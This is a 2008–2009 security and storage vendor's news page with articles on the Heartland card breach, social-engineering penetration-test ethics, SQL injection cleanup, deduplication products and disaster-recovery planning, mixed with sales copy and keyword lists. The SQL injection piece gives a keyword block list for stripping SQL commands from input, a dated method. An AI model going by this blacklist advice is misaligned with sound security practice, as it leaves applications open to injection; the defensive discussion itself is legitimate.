Data Breach Disclosed - 100 Million Credit Cards Compromised - January 20, 2009

Orlando Florida -- A data breach disclosed today by Heartland Payment Systems may well displace TJX Companies' January 2007 breach in the record books as the largest ever involving payment data with potentially over 100 million cards being compromised.

Heartland, a Florida-based provider of credit and debit card processing services said that unknown intruders had broken into its systems sometime last year and planted malicious software to steal card data carried on the company's networks. The company, which is among the largest payment processors in the country, claimed to have discovered the intrusion only last week after being alerted by Visa and MasterCard of suspicious activity.

The card companies' alerts triggered a subsequent investigation by "several forensic investigators" during which the intrusion was discovered, Robert Baldwin Jr., Heartland's president and CFO, said in the statement. The company said the intrusion may have been the result of a "widespread global cyberfraud operation".

Heartland claimed that no merchant data, cardholder's Social Security numbers, or unencrypted personal identification numbers (PIN), addresses or telephone numbers were compromised.

As with most data breach notifications, Heartland offered no explanations on when it was first informed of the breach by the card companies, when in 2008 the company had been breached, how long the intruders had remained undetected, or how many cards might have been compromised in the intrusion. A company spokeswoman did not immediately respond to requests for comment.

But given that Heartland processes more than 100 million card transactions per month, it is very possible that the number of compromised credit and debit cards is at least that much, if not more, said Avivah Litan, an analyst with Gartner Inc. "It does look like the biggest ever," Litan said. The TJX breach involved the compromise of over 45 million cards.

It also appears that those behind the breach "made off with the gold" by intercepting and stealing the so-called Track 2 data from the magnetic stripe on the back of cards, which is all that's needed to create counterfeit cards, Litan said.

Dan Clements, president of CardCops, an identity protection service of Affinion Group Inc., said that he has noticed activity in underground chat rooms that suggested a major compromise at a processor such as Heartland.

Typically when a card is stolen, crooks first check to see if the cards are still active by using it for some transaction -- often a very small donation to a charitable organization -- to see if it works. This sort of validity check has increased by nearly 20% over the past few months, suggesting a major compromise. But it's not clear yet if it is related to the Heartland breach, Clements said.

The Heartland compromise is the second involving a large payment processor over the past few weeks. One Dec. 23, RBS WorldPay, the payment processing division of The Royal Bank of Scotland Group, announced that its systems had been breached by unknown intruders, resulting in the compromise of personal information belonging to about 1.5 million card holders. The compromised information included the Social Security numbers of 1.1 million individuals using payroll cards, the company said.

The incidents suggest that cybercrooks are increasingly beginning to target payment processors, Litan said. "Attacking a processor is much more serious than attacking a retailer. A processor sits at the nerve center of the payment process,"and processes far more payment card data than any retailer, she said.

"More radical security moves" need to be taken by payments industry as a whole to address the problem, she added. Such incidents show that the security requirements of the Payment Card Industry Data Security Standard (PCI DSS) being pushed by the major card companies is clearly not enough, Litan added.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/services-penetration.php

About Us

Sencilo Solutions is a Florida-based integrator specializing in Cost Cutting storage, security and managed services solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, Data Domain, EMC, Hitachi, Symantec, HDS, IBM, Commvault, Xiotech and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, storage virtualization installation, maintenance and knowledge transfer.

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, Tampa, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Clearwater, Kissimmee, Lakeland, Maitland and Cape Canaveral Green Simpana Offerings Projects: BC DR planning Replication De-Dup De-Dupe iSCSI SAN NAS VMware Security EMC NetApp HP IBM Quantum Compliance VTL Data Domain vs Gartner Magic Quadrant Quadrent LTO Backup Exc Pure Disk NetBackup Networker TSM Commvault BakBone D2D D2D2T compare cloud data deduplication thin provisioning DXi Global Compression DDX virtual tape library Data Reduction SEPATON FALCON compare Celerra CLARiiON Equallogic Dell NS20 NS40 CX4 CX3-20 CX3-40 CX3-80 FAS2050 FAS3050 Xiotech Nexsan Avamar DLD3 1500 D3 Storwiz storage compression data Ocarina Networks A-SIS compare Sepaton infopro BlueArc OnStor Microsoft Unified Storage data protection StorageX Brocade FAQ SSD Solid state disk SANmelody FalconStor tier zero Xiotech ISE nx4 ax4 greenBytes ZFS Sun Top 10 ROBOBak managed services hosting cloud grid Datacore Compellent compellant equallogic lefthand networks don't buy storage stop buying storage itguardian cherub networks Arkeia Network Backup appliance Data Recovery Backup Health IT Healthcare IT Digital Hospital Allscripts

Disaster Recovery Planning Starts Before the Disaster - December 19, 2008

Tampa Florida -- The corporate headquarters building for OSI Restaurant Partners is a mere 800 feet from the end of runway at Tampa International Airport. But according to OSI Chief Information Officer Dusty Williams, that's the least of their concerns.

OSI, the company that owns popular restaurant-chain brands such as Outback Steakhouse, Roy's and Carraba's Italian Grill, is smack dab in the eye of the storm zone, in hurricane country. Their 750-person operation in Tampa includes all back office functions, including the financial, legal and real estate divisions. If a hurricane strikes and the building is impacted, the amount of sensitive data that is at stake is immeasurable.

"We're in an A zone as far as flooding is concerned. You don't really want your data center here."

The 2008 Atlantic hurricane season produced a record number of consecutive storms, according to National Oceanic and Atmospheric Administration. The season saw a total of 16 named storms. With water temperatures rising due to climate change, many meteorological experts predict even tougher seasons to come. For companies in a hurricane zone, business continuity and disaster recovery preps need to be in place now, and not when the storm clouds begin churning.

It is that kind of thinking that inspired Williams to find a new home for the data center. In 2003, the main data center in headquarters had no back up power and a business continuity/disaster recovery plan was a vague notion. Williams got initial approval to move OSI's data center to an off-site facility hosted by backup and storage service provider Qwest.

"Typically when we talk BC/DR, it's always around hurricanes. The plan was to move the data center locally to a Qwest facility," said Williams. "The building itself is a category 3 or 4 that is built to sustain hurricane damage and has back up and battery power that we don't have in the headquarters facility."

Within months, the plan was put to the test. Florida experienced a severe hurricane season in 2004. Williams said Hurricane Charley illuminated the fact that they had made the right decision to move data off-site.

"On a Thursday night at 5 o'clock, officials told us they would be shutting power down to the grid we are on. So, if we had not outsourced the data center, we would have been dead in the water. "

Williams said the entire summer of '04 was spent preparing for hurricanes. At least four blew through the area of varying intensity. While no major damage was sustained, when the season was over, it became clear that the BC/DR plan needed to include more than just one off-site data facility. OSI now has a second cyber center in Chicago that includes all critical systems. The company has more than 1200 restaurants around the country. The Chicago center would allow OSI and its restaurants to have operations back up and running within a few hours if the Florida off-site facility went down, according to Williams' estimate.

OSI's BC/DR plan is tested regularly to ensure connectivity to restaurants is maintained. Williams says he tests by bringing the main data center down and bringing the Chicago facility online.

Outsourcing the data center is crucial to any business with a natural disaster risk, according to Iain Hardcastle, senior consultant with professional services firm Deloitte & Touche at their operations in Bermuda. On the small island where his company operates, there is only one power supply. The local office, which stores all data on a SAN, also replicates the information at a local data hosting center.

"The accounting side of our business is managing trust funds and looking after accounts for many name-plate companies. They can be absolutely multimillion-dollar, global clients. They dont care if we have a bit of a weather problem down here."

"Buns on seats" preparations
The data is only one part of the picture when it comes to business continuity in a natural disaster-prone area. If a facility goes down because of power failure or flooding, many organizations need a physical location to place their staff so operations can continue. Deloitte has what Hardcastle refers to as a "buns on seats" office off-island. So, too, does OSI. OSI maintains a comprehensive facility in Atlanta, which they have had to use at least twice in the last 4 years.

"Once we declare a disaster, we have 50 cubes available there," said Williams. "But we have to go up and make sure everything is up and running and ready. So we have people, from an IT perspective, head up 72 hours out ahead of any storm in private aircrafts to make sure everything is ready to go."

Sometimes it isnt just humans that need to be relocated. One year, according to Williams, OSI tried to send a check printer up in a plane so vendor checks could continue to be cut. Unfortunately, the machine didn't fit through the door of the aircraft. The check printer was delivered to Atlanta by van instead.

The process of relocating people, and sometimes equipment is time consuming, labor intensive and costly. The company even has contracting companies on standby for employees that may need assistance with boarding up houses before they depart. As complicated as it all sounds, Williams says, thankfully, most of it can be planned.

"With hurricanes, you have a distinct advantage over an earthquake or a tornado. You really don't know when they will strike."

Can you ever be completely prepared?
Even the most comprehensive BC/DR plan isn't without some risk, according to Hardcastle, who calls the Sencilo Solutions BC/DR plan a "continuously evolving process."
Williams admits he is still troubled at the prospect of keeping track of personnel in a worst case scenario.

"I dont worry as much abut the technical side of it as a do the operations/people side of it. How do you find people?" he said.

OSI says disaster plans are also considered regionally for all of its 1200-plus restaurants and each have special numbers set up so people can dial-in and alert the company as to where they are.

"But you worry about how long that will take if cell service, phone service, is down" said Williams.

And despite the plans put in place at the headquarters building, there will still inevitably be some loss if the facility itself is damaged in high winds or flood waters, said Williams.

"Sometimes people have paper on their desk that they havent put into a system yet. In those cases you need to ensure you have connections with vendors to ask them "How can we get your invoice back in here and get you paid?"

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/back-up-restore.php

About Us

Sencilo Solutions is a Florida-based integrator specializing in Cost Cutting storage, security and managed services solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, Data Domain, EMC, Hitachi, Symantec, HDS, IBM, Commvault, Xiotech and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, storage virtualization installation, maintenance and knowledge transfer.

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, Tampa, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Clearwater, Kissimmee, Lakeland, Maitland and Cape Canaveral Green Simpana Offerings Projects: BC DR planning Replication De-Dup De-Dupe iSCSI SAN NAS VMware Security EMC NetApp HP IBM Quantum Compliance VTL Data Domain vs Gartner Magic Quadrant Quadrent LTO Backup Exc Pure Disk NetBackup Networker TSM Commvault BakBone D2D D2D2T compare cloud data deduplication thin provisioning DXi Global Compression DDX virtual tape library Data Reduction SEPATON FALCON compare Celerra CLARiiON Equallogic Dell NS20 NS40 CX4 CX3-20 CX3-40 CX3-80 FAS2050 FAS3050 Xiotech Nexsan Avamar DLD3 1500 D3 Storwiz storage compression data Ocarina Networks A-SIS compare Sepaton infopro BlueArc OnStor Microsoft Unified Storage data protection StorageX Brocade FAQ SSD Solid state disk SANmelody FalconStor tier zero Xiotech ISE nx4 ax4 greenBytes ZFS Sun Top 10 ROBOBak managed services hosting cloud grid Datacore Compellent compellant equallogic lefthand networks don't buy storage stop buying storage itguardian cherub networks Arkeia Network Backup appliance Data Recovery Backup Health IT Healthcare IT Digital Hospital Allscripts

Penetration Testing and Best Practices - September 16, 2008

Orlando Florida -- Penetration testing is an important means of assessing the strength of an organization’s information security program. A security system may look good from the inside, but a test is an excellent way to determine if it will hold up under pressure. These tests can range from simple port scans to all-out hacking attacks. However, since security depends on people, not just on technology, social engineering is one possible tool for use in penetration tests. Deception is a common means of breaching a security system, and a social engineering test can ascertain the strength of policies and how well employees follow those policies.

"However, the use of social engineering in penetration tests raises ethical issues because humans are being used for research purposes," says Brian McCarthy CEO and well known Security Professional for Sencilo Solutions in Lake Mary Florida. Abuses such as Nazi experiments on prisoners and the Tuskegee Syphilis Study have led to a body of widely accepted guidelines for the ethical use of human subjects in research. I will draw upon human research principles and a few sample cases to identify ethical guidelines for the use of social engineering in penetration testing.

Cases

Piggybacking: A security consultant wearing a suit and tie, and carrying a briefcase, stands at the front entrance to a corporation. He waits for an employee to unlock the door with her ID scan and follows her in.

Shoulder Surfing: A security consultant notices employees standing outside a door smoking on their break. He walks over and mills about looking over his shoulder as employees enter the keypad code to reenter the building. With that information he lets himself in.

Computer Technician: Two security consultants walk into an office wearing “Computer Doctors” jumpsuits. They tell the administrative assistant that they have an order to fix the system. The assistant says, “Mr. Smith did not tell me about this, and he’s on vacation today and can’t be reached.” They reply, “We’re booked for the next two weeks. The system is overheating and could melt down at any moment. If it burns up because we were not allowed to work on it, somebody’s going to get fired. Are you sure you didn’t forget the order?” The assistant nervously lets them in.

Bribery: A security consultant posing as a representative of another company approaches an employee outside of work and offers him $50,000 to get some memos concerning the company’s plans for a new product.

The cases described in the previous column have been deliberately ordered from least to most ethically troubling. I would argue that there are morally relevant differences between the shoulder-surfing and piggybacking cases on one hand, and the computer technicians and bribery cases on the other. For one, the latter two penetration-testing cases expose the employee being tested to significant psychological stress. The employee in the computer technician example is worried about losing his job, while the one is the bribery example is faced with an offer to do something illegal.

Moreover, the deception in the latter two cases is established by verbal manipulation. Why is this relevant? After all, all cases involve some level of misrepresentation, and we can just as easily misrepresent ourselves with our appearance and actions as we can with our words.

The difference is that when the deception is established verbally, the deceiver is plugging into deep-seated psychological triggers humans use to establish trust with others. Con men are good at playing on these triggers, and while people can be expected to follow procedures, they cannot be expected to resist the kind of psychological manipulation employed by skilled manipulator. We would say the same thing of an attractive consultant soliciting an executive to see if he would exchange sex for secrets. The enticement is unfair. Moreover, the episode will undermine the employee’s trust in the company.

There is also the question of the professionalism on the part of the consultant when he moves from providing security advice to acting. Once the deceiver starts the charade, he will not know how much acting will be needed to get the employee’s cooperation. At some point the question becomes whether the consultant is measuring the strength of the company’s security policies, or his own acting skills. The consultant has put himself or herself into a compromising situation that could undermine faith in the profession as a whole.

Finally, what is the employer going to do with the employee in the bribery case if he agrees? The employer cannot trust the employee anymore, yet if he fires the employee, he can be accused of entrapment.

The first and most obvious warning is that bad penetration testing in general is pointless unless the organization has implemented the best available security measures it can manage. Why bother testing security if even a simple vulnerability analysis or common sense assessment shows gaping holes? A penetration test of obviously flawed security is a waste of time and money.

In a Network World column published in 2000, I pointed out that deception techniques should be used only with a great deal of preparation of the staff. When preparing for a penetration test that involves social engineering, everyone in the organization should be thoroughly trained to understand the techniques of social engineering before beginning the tests.

The key points were as follows (from my article):
* The entire organization can prepare for social engineering simulations as a team; no one is subjected to attempted deception without knowing that the experience was part of a training and awareness exercise.
* Even if someone falls for a trick, the emotional effect is far less than if the same error occurred without preparation.

I think that preparing staff for the onslaught of skilled social engineers has many benefits. We can frame the exercises as a form of game or contest: who will be the best at spotting the confidence tricksters? Who will be quickest to foil their nefarious plans?

Role-playing games are an excellent way of changing beliefs, attitudes and behavior: having staff members take up the roles of social engineer and defender - and then reversing roles - is not only amusing, but it also has a long-term effect on people’s perceptions. It’s much easier to remember a social interaction we’ve experienced personally than to pay attention to abstract words. We can even turn the event into an opportunity for a good deal of fun and laughter, making security and secure behavior a positive experience instead of the usual drudgery.

Moreover, in addition to risk avoidance (reducing the likelihood of hurt feelings, frustration and anger), solid preparation can result in increased vigilance at all times. Once staff members are sensitized to the social engineering tricks they’ve experienced in role-playing games, they are more likely to recognize them in strangers. Having practiced alerting the security team to apprehended breaches, they will find it easier to take the initiative later when they spot real breaches.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/services-penetration.php
 

About Us
 

Sencilo Solutions is a Florida-based integrator specializing in network storage and information security solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, NetApp, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.
 
Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Kissimmee, Lakeland, Maitland, Cape Canaveral, Lake Mary
Other products include Barracuda Networks Security RSA Encryption Cisco Decru Neoscale Compliance vs. Gartner Magic Quadrant SSL VPN SonicWall Secure Computing Firewall VPN Endpoint DLP Tumbleweed Ironmail Ironport Secure Computing compare data leakage enVision Data Loss Prevention Encryption and Key Management CA Symantec Juniper Penetration testing Digital data forensics cyber forensics data recovery services Best Practices

 

 

How to deal with SQL Injection Attacks - August 17, 2008

Orlando Florida -- It’s not like SQL injection attacks are new. They go back to at least late 2004, when they appeared in Europe and Asia.  A German TV station was attacked, then a Taiwanese security magazine.  In 2006, Russian hackers broker into a Rhode Island government website and stole credit card data.

The attacks were proliferating.  In 2007, a hacker defaced the Microsoft UK web site.  Later on that year, the UN website was defaced with a SQL injunction attack.  Have they no shame?

In January 2008, tens of thousands of PC websites were defaced by automated SQL injection attacks that exploited the vulnerability of Microsoft SQL server.

In April 2008, the social security numbers of the sex offenders on the Sexual Offender Registry of Oklahoma were stolen by an injection attack.

In May 2008, a server farm in China used automated queries to Google’s search engine to identify SQL server websites that were vulnerable.

In July 2008, the Malaysian site for Kaspersky, a Russian computer security company, was hacked using a SQL injection.

From April 2008 to the present, there have been increasing SQL injection attacks exploiting the SQL injection vulnerability of Microsoft Internet Information Services and SQL server.

HOW THE INJECTION ATTACK WORKS

These attacks don’t require the hacker to have access to the server or, for that matter, the names of database fields.  The attack is on all text fields in all tables with a single hacked SQL request.  The attack attaches an html string to each field that activates a malware javascript file called from a remote location.  When that value is later displayed to a user of the hacked site, the script tries to gain control over the user’s system.  When in fact the purchase of a a Barracuda Web Site Firewall protects Web applications and Web services from malicious attacks, and can also increase the performance and scalability of these applications. The Barracuda Web Site Firewall offers every capability needed to deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface.

The number of exploited web pages is estimated at 500,000 so far, and growing daily.  These attacks are across the board, against government sites and well as commercial sites, and against open source SQL as well as Microsoft SQL.  The attacking mechanisms can be manual or by automated spiders or by modified versions of popular software such as QuickTime and RealPlayer.

SQL is a rich and complex language, so there are many techniques by which the attack can be accomplished.  The common approach is for the hacker to modify a variable being passed from the user’s browser URL address line or from a form on the browser to a SQL search string which is being processed on the website.

With this approach, hackers or their automated spiders can inject draconian instructions into the SQL commands written for the site, and these can do any number of awful things, like stealing all the data from the SQL database, destroying the database altogether or modifying the records by adding references to remote malware that spreads the attack through innocent visitors using the site, in a kind of Trojan horse virus.

HOW DO YOU KNOW YOU’VE BEEN HIT

Don’t think you’re somehow exempt.  If you’re using SQL in any form you’re vulnerable.  Most websites are data driven these days, and most of those use SQL in one form or another.  The hackers and their spiders may very well visit an attack on your site any time.

It goes without saying you need to back up your SQL database, all of it, every day and keep those backups for perhaps a longer period of time than before.  If you have 10 days of backup but you don’t watch your site and 10 days go by, you won’t have a useable backup and you’ll be SOL.

How do you know you’ve been attacked?  "Well, the data on your screen is truncated and you get strange characters like hanging apostrophes and angle brackets on your screen where database information ought to be.  Sometimes you get wise guy jokes there too.  Don’t click on what appear to be links - that’ll get you in more trouble and infect your machine too", says Brian McCarthy President of a Security VAR in Central Florida Sencilo Solutions.

HOW TO DEAL WITH THEM

If you’ve been attacked, you need to go to Internet Information Services (IIS) on your server and cut user connections, and stop the site.  Then you need to find a good backup file to restore your database.  For that, you need to figure out when the attack happened so you can use a backup from before it happened.  "If you don’t have a good backup, you’ll probably have to clean the database manually to recover the data for your site," says McCarthy. 

That means stripping out all the bad values and references that were injected.  You have to painstakingly go through every field, record and table.  In a big database, this can take forever, and it’s tedious and gut-wrenching work.  Worse, it may not be a complete solution.  The injection values are usually injected at the end of the existing values in the field, but if the injection values are longer than the field, they may write over the existing values, and that means the original data is lost.

When you’re done, you would turn IIS back on and see if you’ve done a good job, and whether there is some other gift they left for you.  You don’t know until you bring the site up again and watch it work.

There are some scripts out there that say they can reverse the attack and clean the injected values out of your database. Here’s an example:

http://hackademix.net/2008/04/26/mass-attack-faq/#webdev

Different hackers inject different values, so there’s no guarantee that this will work.

Even assuming you can restore your database, you could have another attack any time with similar result.  So if you have a good backup file of your database, make a protected copy of it for future use if necessary.

CLOSING THE VULNERABILITIES

Beyond that, you or your web designers need to close the vulnerabilities.  You can do that in a variety of ways, all of which involve new coding.  Go slowly and carefully, file by file, so you do it right and don’t miss anything.

When you recode, you need to write routines to clean all the parameters that are being fed into your SQL queries.  To do this, you need to strip out any questionable SQL commands that could be part of an injection attack, including DECLARE, SELECT, SET, CAST, DROP, EXEC,”;”, “–”, INSERT, DELETE, XP_, VARCHAR and CHAR, among others.

WILL WE EVER CATCH THESE GUYS

Maybe not be in the meant time the Barracuda Web Site Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Site Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/products-security.php
 
Sencilo Solutions is a Florida-based integrator specializing in network storage and information security solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, RSA, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.
 
Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Kissimmee, Lakeland, Maitland, Cape Canaveral, Lake Mary

Other products include Barracuda Networks Security RSA Encryption Cisco Decru Neoscale EMC NetApp Compliance vs. Gartner Magic Quadrant SSL SonicWall Secure Computing Firewall VPN Endpoint DLP Tumbleweed Ironmail Ironport Secure Computing compare data leakage enVision Data Loss Prevention Encryption and Key Management CA Symantec Juniper Symantec Norton SPAM

Magic Quadrant Leader -- Quantum DXi 7500 Now Shipping - July 21, 2008

Orlando Florida -- Quantum Corp. is rolling out it's third generation DXi7500 data deduplication system to give it a smaller entry point and to make it easier to manage in the wake of increased competition in the data deduplication market.
The DXi7500 is the flagship of Quantum's data deduplication family, and it finally hit the market in June – 11 months after Quantum announced it. Quantum today rolled out a management application called Quantum Vision and a DXi7500 configuration that starts at 9 TB of usable data. The DXi7500 previously started at 18 TB. The high-end remainsat 180 usable TB data (240 TB raw data).

The major feature of the DXi7500 enterprise disk backup platform is it gives customers a choice to dedupe data inline (while writing to disk) or post process (after writing to disk). Quantum refers to the methods as adaptive (inline) and deferred (post process). Its smaller data deduplication appliances, the DXi3500 and DXi5500, only perform post-process deduplication and competing deduplication products support one or the other deduplication method.  "No other vendor offers this technology and was the key reason we stopped marketing the Data Domain DDX series, along with their low performance and lack of expandation," says Brian McCarthy President of Sencilo Solutions.  Up until late last year Sencilo was one of Data Domain's largest resellers, says McCarthy. 

Quantum recommends adaptive deduplication to back up small offices, virtual servers and mailboxes, and deferred deduplication to back up applications with large amounts of new data or large OLAP databases.

Today's upgrades come as Quantum tries to carve a place for itself in a crowded data deduplication market. When Quantum rolled out the DXi3500 and DXi5500 in early 2007, Data Domain was the only major dedupe target competition. Now, EMC, IBM, Hewlett-Packard, FalconStor, Sun, Hitachi Data Systems, Sepaton, Copan, Exagrid, Overland and NEC all have data deduplication backup products through their own IP or partnerships. NetApp offers dedupe as part of its operating system for primary data, and industry sources say it is close to bringing out deduplication for its virtual tape library (VTL) products.

Quantum even competes with its own data dedupe code because EMC licenses it to run on EMC disk libraries.

"There's more competition and the stakes are higher now," said analyst Brian Garrett, Enterprise Strategy Group. "Quantum's been at it for a while, and they've learned a lot of lessons."

Quantum hasn't had much success with its data deduplication products yet, and the management interface received complaints from customers. But the Vision console includes GUIs showing performance and capacity trends, historic and current dedupe ratios, replication status, and monitoring and usage reports for arrays and tape libraries, network switches and backup applications. Along with the DXi devices, Vision shows information on Quantum's tape and nondedupe disk systems on the same console.

"We haven't had a single tool that lets you see multiple systems," said Steven Whitner, Quantum's product marketing manager for disk systems.

Vision is the more interesting of today's releases, Garrett said. "Their trending stuff is really rich. Just showing dedupe rates over time is a key value. That's conspicuously absent from dedupe products," he said. "They do a good job of reporting on how it's going right now, but what about last week at this time? How much am I saving over time?"

As for the smaller DXi7500, Whitner pointed out the DXi5500 maxes out at 11 TB of usable data and there was a gap between that and the previous smallest DXi7500. "This is a way of keeping the whole product line smoothly scalable," he said.

Pricing for the 9 TB DXi7500 begins at $95,000 for NAS and data deduplication licenses, and Quantum Vision starts at $7,500 for a two-system license. This is half the price of a similiar Data Domain DD595/

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/storage-data-deduplication.php

About Us

Sencilo Solutions is a Florida-based integrator specializing in Cost Cutting storage, security and managed services solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, Data Domain, EMC, Hitachi, Symantec, HDS, IBM, Commvault, Xiotech and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, storage virtualization installation, maintenance and knowledge transfer.

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, Tampa, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Clearwater, Kissimmee, Lakeland, Maitland and Cape Canaveral Green Simpana Offerings Projects: BC DR planning Replication De-Dup De-Dupe iSCSI SAN NAS VMware Security EMC NetApp HP IBM Quantum Compliance VTL Data Domain vs Gartner Magic Quadrant Quadrent LTO Backup Exc Pure Disk NetBackup Networker TSM Commvault BakBone D2D D2D2T compare cloud data deduplication thin provisioning DXi Global Compression DDX virtual tape library Data Reduction SEPATON FALCON compare Celerra CLARiiON Equallogic Dell NS20 NS40 CX4 CX3-20 CX3-40 CX3-80 FAS2050 FAS3050 Xiotech Nexsan Avamar DLD3 1500 D3 Storwiz storage compression data Ocarina Networks A-SIS compare Sepaton infopro BlueArc OnStor Microsoft Unified Storage data protection StorageX Brocade FAQ SSD Solid state disk SANmelody FalconStor tier zero Xiotech ISE nx4 ax4 greenBytes ZFS Sun Top 10 ROBOBak managed services hosting cloud grid Datacore Compellent compellant equallogic lefthand networks don't buy storage stop buying storage itguardian cherub networks Arkeia Network Backup appliance Data Recovery Backup Health IT Healthcare IT Digital Hospital Allscripts

Cost Cutting Tips and Tricks for DR Plans - July 18, 2008

Orlando Florida -- In these days of extremely tight budgets and ever-increasing energy and transportation costs, who would waste money? You have to look at your spending from various angles to see where you may have wasted dollars. For example, refusing to spend money on technologies that can reduce your disaster recovery (DR) deployment and testing costs actually wastes money. This is the first of the top DR budget wasters discussed in this tip.

Not virtualizing your data center: Virtualization can save you money in DR maintenance and testing. "I have talked to many customers who have leveraged virtualization to build DR solutions, even with applications that are not readily consolidated. In other words, they have implemented a 1:1 consolidation ratio just to gain the benefits of virtualization's mobility to simplify DR," says Brian McCarthy President and Enterprise class VMware Consultant in Lake Mary Florida. 

Consolidated virtual infrastructures can save even more money. Let's look at a real life example from a CIO of a medium sized business I spoke with. Like many companies diving into virtualization, they had virtualized the bulk of their applications and services in order to gain the benefits of consolidation. The CIO had not thought that he would see any additional savings and was very pleasantly surprised to see a dramatic reduction in DR testing time and personnel.

Before they virtualized, their DR tests (performed twice a year) would take three to five days to complete with seven to 10 IT staff involved. After virtualizing, the testing time dropped to one to two days and used only two IT staff. How much money does this save? Assume that a fully burdened IT engineer costs $175,000 per year and works 260 days per year. Best case savings for this company (10 staff for five days twice a year down to two staff for one day twice a year) is $64,616 per year and that does not include opportunity costs -- the work that was not being done by the extra IT staff that was busy performing the DR testing tasks. To be fair, let's look at the worst case savings (seven staff for three days twice a year down to two staff for two days twice a year) that would still be a savings of $22,884 per year. Bottom line: Leverage virtualization to avoid wasting money on DR testing.

Not maintaining your DR plan: You have spent considerable time and money on your business continuity plan. You have the plan implemented, or so you think. You have performed an initial test or two. But business needs and tightening budgets drive you down the path of justifying putting off the next DR test until the current critical project is completed. By the time that project is mostly completed, the next critical project is looming over your head. Again, you delay your DR testing to focus on meeting the demands of the business. This vicious cycle continues and continues. Does this sound familiar?

I've seen this too many times, even in large mature IT organizations. Putting off your plan maintenance and testing means that you spent your initial DR investment in vain. You wasted all that money -- thousands to millions of dollars. Without ongoing testing and maintenance, history has proven time and time again that recovery is bound to fail, or at least take longer than expected as the staff wades through hundreds of small issues that would have been resolved through regular plan testing and maintenance. Bottom line: Maintaining and testing your plan is a critical project; without maintenance, any money spent on DR previously is mostly wasted.

Lack of CEO oversight and board involvement: I've heard too many stories where business continuity and DR is driven from the CIO and not the CEO. All of the companies that have experienced a disaster where the DR plan was driven by the CIO have had one thing in common: The IT department is up and running, but the rest of the business is broken and in a disaster state.

DR and business continuity are the safety nets for the health of the whole company, not just the IT department. DR planning, testing, and maintenance should be driven by the CEO and board of directors as a top priority. It represents protecting all corporate assets. When DR is not being driven by the CEO, all the money and time spent on DR by the CIO is in vain. It is wasted as the overall corporation remains in a non-functional state in the event of a disaster.

On the bright side, I talked to a CIO who had a CEO that drove DR across their company (a large distributor with five warehouses and a central data center). This CIO wasn't that excited about DR personally, but kept the plan going as a result of the CEO's continued vigilance. When Internet communications were cut to the central data center by an impatient back-hoe operator, the plan operated within parameters so that orders did get out by their deadlines. Some minor issues with the plan were discovered and repaired, and in the post mortem, it was determined that the plan worked. It had included the whole company, and it was the business units and employees that kept the business running while the data center was off-line. Bottom line: DR and business continuity are only effective if driven by the CEO and board of directors across the whole company. "Any money spent on DR for IT alone without DR for the rest of the company is wasted, says McCarthy.

Over protecting your environment: I have not seen this sin committed as often as the preceding mistakes, but I have seen it nonetheless. Executives tend to believe every service and component is critical and needs protecting at top levels -- especially at companies new to building business continuity plans. Handing them the bill for what they are asking usually brings a level of sanity back to the business unit head.

I have seen companies implement a recovery data center with site-to-site replication and hot, ready-to-go servers. They place all their services and applications into the hot site system regardless of system criticality. As a result, they protect systems at high costs that require much less aggressive protection at much lower costs (e.g., simple weekly tape backup stored off-site).

A detailed business analysis of each system can avoid such mistakes. Let's look at a slightly different example that can illustrate this point. I talked to the CIO of a large enterprise and he shared an interesting story. The sales division came to him asking for a customer account licensing tracking system for a very special class of customer. The company offered various levels of product licensing with the bulk of their millions of customers buying their standard product. The standard product license was already automated in an account tracking database system. This special class of customer license had some specific needs that could not be met by the general system.

The CIO put out RFPs and received proposals to retro-fit or add a completely new system with redundancy and protection for $2 to $3 million dollars. Then he asked the sales division how many customers are in this special case, and learned that it was currently about 400 customers. He then asked how fast that special licensing customer group was growing and what they expected it would be in three years. The answer, maybe ten percent in three years.

